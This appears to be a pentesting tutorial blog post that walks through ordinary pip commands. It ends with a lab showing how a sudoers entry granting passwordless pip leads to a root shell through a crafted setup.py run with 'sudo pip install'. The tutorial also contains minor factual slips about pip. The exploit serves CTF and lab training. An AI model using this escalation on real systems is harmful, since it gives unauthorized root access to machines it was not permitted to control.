Privilege Escalation

Linux for Pentester: pip Privilege Escalation

The main objective of this article is to make attentive our readers for the other most expedient command from the list of Linux for pentesters. As we know apart from copying, downloading and searching task user desires other excessive operational mission i.e. installation of packages. So in this article, we are going to make you familiar with the command that can perform such task i.e. “pip”. The main utilities of this command are to install, uninstall, search python packages. So by knowing this functionality of pip command now, we will check how we can acquire its benefit in our mission of Privilege Escalation.

NOTE: “The main objective of publishing the series of ‘Linux for pentester’ is to introduce the circumstances and any kind of hurdles that can be faced by any pentester while solving CTF challenges or OSCP labs which are based on Linux privilege escalations. Here we do not criticize any kind of misconfiguration that a network or system administrator does for providing higher permissions on any programs/binaries/files & etc.”  

Table of Content

Introduction to pip                                        

  • Major Operation performed using pip

Exploiting pip

  • SUID Lab setups for privilege Escalation
  • Exploiting SUID

Introduction to pip

Before we start, let’s do a quick appendix check and determine what a ‘Python package’ is in actually. It is a Python module that can contain other modules or, recursively, other packages. It is the kind of Python package that you import in your Python code. So there are many tools available that help to install such packages and “pip” is one of that which is widely used in today’s era.

The pip is an abbreviation of “Python Install Packages” which is a tool for installing and managing Python packages. This command is very useful for web development as well as for sys-admins who manages cloud computing-based resources. Now we will start by running its help command to know the depth of “pip” operations.

pip --help

Major operations performed by “pip”

List all installed packages: To begin with, to check the list of all installed Python packages on our machine, we can use the “list” option followed by the pip command. Notably, the list option plays a vital role in the pip command, as it can perform many operations that a user might require. For example, some of these functions are listed below:

  • List installed packages: This will help in listing all the installed packages.
pip list

Other option for package listing:

Syntax: pip list  <options>

List outdated packages: Whenever we wish to check the list for all those packages that are outdated then we will use “–outdated” option followed by pip list command which will provide the list of all installed outdated packages with its current and latest version.

pip list --outdated

List installed packages with column formatting: If we want to display the desired output in a specific format, then we will use the “–format” option for this purpose. Suppose I want to wish to list the details in column format then I will frame command as below.

pip list --format columns

List outdated packages with column formatting: This is same as format option consisting some more fields to display the output as the current version, latest version, and type of installed packages.

pip list -o --format columns

List packages that are not dependencies of other packages: whenever anybody required to check the list for those installed packages who do not have any kind of responsibleness of other packages then we will frame command as below.

pip list --outdated --not-required

To install the new package: As above I have described the main objective of pip command is “installing new packages” so now by grabbing this advantage I am installing ‘flask”.

Syntax: pip install <package name>
pip install flask

Show information about packages: The “show” option in pip assist to reflects the detailed information about installed packages.

Syntax: pip show <package name>
pip show flask

As illustrated in the image below, it can be clearly understood that after using the show option, it produced the output by displaying the relevant information about Flask.

To uninstall any package: Apart from installing the software packages, we also require its other phase i.e., uninstallation. The pip command tends this utility too where one can uninstall the desired packages without any hassle.

Syntax: pip uninstall <package name>
pip uninstall jinja2

Here in the image below, I’m showing to uninstall “jinja2” which is a modern-day templating language for Python developers.

To freeze any package:  Freezing is a procedure where pip reads the versions of all installed packages in a local virtual atmosphere and then produces a text file with the package version for each python package stated. For performing this operation use option “freeze” as shown below.

Syntax: pip freeze > <filename>
pip freeze > komal.txt

To search for an installed package: The search option helps to search for an available Python package. The search term generates quite a widespread group of packages.

Syntax: pip search <package name>
pip search keyring

Most of the time, we wish to hunt for packages directly on the PyPI website. So PyPI delivers such search abilities for its index and a way to filter results.  Now I’m framing the command as shown below to search for “keyring”.

To create a hash for any package: A Hash Value is a string value of specific length which is the result of calculation of a Hashing Algorithm. One of the chief uses of Hash Values is to define the Integrity of any Data (which can be a file, attachments, downloads etc).

Syntax: pip hash <package name>
pip hash rockyou.txt

The pip provides this functionality too to maintain the integrity of installed packages. In below image, I’m using this option for creating hash value of a file i.e. “rockyou.txt.

To download any file or package: Instead of above all described task “pip” also supports the functionality to upload, download, read etc. for any file. Here I’m using one of these i.e. download the package. Pip download use to download file and package into default path or can do the same for a specific path.

In below image I have used this to download a compressed file from remote location.

Syntax: pip download <path>
pip download http://192.168.1.10:8000/5622.tar.bz2

Exploiting pip

Sudo Rights Lab setups for Privilege Escalation

Then we will start our task of privilege escalation. For this very first we have to set up our lab of pip command with administrative rights. After that, we will check for the pip command and what influence it has after getting sudo rights and how we can use it more for privilege escalation.

It can be clearly understood by the below image in which I have created a local user (test) who own all sudo rights as root and can achieve all task as admin.

To add sudo right open etc/sudoers file and type following as user Privilege specification.

test All=(root) NOPASSWD: /usr/bin/pip

Exploiting Sudo rights

Now that we have initiated the exploitation phase, we will start exploiting the pip service by taking advantage of the sudoer’s permissions. Suppose we have obtained a session on the victim’s machine; this access will assist us in gaining local user privileges on the targeted system, through which we can escalate to root user rights.

Very first we will connect to the target machine with ssh, therefore, type the following command to get access through local user login.

ssh test@192.168.1.108

Then we look for sudo right of “test” user (if given) and found that user “test” can execute the pip command as “root” without a password.

sudo -l

Now after knowing the fact that test user attains admin rights so, taking this benefit here we can use pip command to run in privileged context and can be used to access the file system, escalate or maintain access with higher privileges if permitted on sudo.

TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF

Conclusion: Hence, we have successfully exploited pip by achieving its functionality after granting higher privilege.  

Reference link: https://gtfobins.github.io

To Learn more about Privilege Escalation. Follow this Link.

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer. She is a completely enthusiastic pentester and Security Analyst at Ignite Technologies. Contact Here